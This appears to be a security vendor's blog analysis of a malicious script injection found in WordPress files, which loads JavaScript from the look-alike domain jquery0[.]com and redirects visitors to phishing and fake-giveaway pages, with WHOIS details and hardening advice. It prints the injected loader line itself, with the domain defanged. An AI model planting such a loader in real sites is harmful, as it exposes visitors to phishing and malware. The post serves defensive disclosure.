Website visitors may see the reputable jQuery name in the requests and assume that it’s safe to load. Unfortunately, the domain is not a perfect match and is malicious in nature. This is a common tactic used in phishing and spam campaigns to trick victims into thinking resources are legitimate.
Let’s take a look at the injection.
var khutmhpx = document.createElement('script'); khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ'; document.getElementsByTagName('head').appendChild(khutmhpx);
Let’s break down what this 3 line piece of code is doing.
- First, the code creates a new script tag with https://jquery0[.]com/JkrJYcvQ as its src parameter.
- Next, it appends it to the current page and initiates the execution of the script.
- Finally, the injection executes the script https://jquery0[.]com/JkrJYcv which then redirects users to scammy websites.
This injection has been found in a number of different WordPress files, like these for example:
Dissecting the malicious jquery0[.]com domain
Let’s take a closer look at the malicious domain used in the script we just described.
Reviewing the WHOIS data for the https://jquery0[.]com domain can reveal a lot about it.
From these results, we know the following:
- The domain was purchased recently. (July 04, 2022)
- The domain is using CloudFlare, commonly used by attackers.
What’s notable is that the domain only uses CloudFlare for the Name Servers — it doesn’t use the CloudFlare firewall. DNS records point directly to IP 62[.]233[.]50[.]75 on a Russian CHANGWAY-AS network: https://urlscan.io/ip/22.214.171.124.
Redirects to scam pages
Once the malicious script is initiated, end users are redirected to scam websites which coerce victims into submitting personal information. For example, one of the variants promotes the following fake Apple iPhone 13 Pro giveaway.
When the victim clicks Ok, they are redirected to a form that harvests sensitive personal details.
As is common with phishing pages, attackers leverage a sense of urgency and expiration date to compel victims into making a quick decision to enter their data.
This is only one of many possible variants of this scam, however. MalwareBytes has recently revealed that this domain is also linked to FakeUpdates and SocGholish malware campaigns.
💡 The same injection with jquery0[.]com is also used to redirect to #FakeUpdates/#SocGholish
➡️ Domain shadowing:
[.]demand[.]sageyogatherapies[.]com https://t.co/tGQvh5MMax pic.twitter.com/nmjADVmqWs
— Malwarebytes Threat Intelligence (@MBThreatIntel) October 12, 2022
Typical domain names that the infection redirects to include:
The owners of these domains also operate the dating scam sites on domains like
URLScan detections and internal SiteCheck data show ongoing activity for the jquery0[.]com domain.
Injecting malicious scripts into WordPress files is a common tactic used by attackers after they have gained unauthorized access to a WordPress website. These scripts can be well hidden in WordPress core files and plugin files and will trick end users into giving away their personal information.
- Keep your plugins, themes, and website software up-to-date. Always patch to the latest version to help mitigate risk known software vulnerabilities.
- Regularly scan for backdoors and malware. That means scanning at the server and client level to identify any malicious injections, SEO spam, or backdoors that may be lurking on your site.
- Enforce unique passwords for all of your accounts. That includes credentials for sFTP, database, cPanel, and admin users.
- Monitor your logs for indicators of compromise. Regularly check for unusual or suspicious behavior and consider using a file integrity monitoring system on your website.
- Get a web application firewall (WAF). Firewalls can help mitigate bad bots, prevent brute force, detect attacks in your environment.
And if you believe your site has been compromised or injected with malicious scripts, we can help! Reach out to our support team for assistance and we can get the malware cleaned up for you.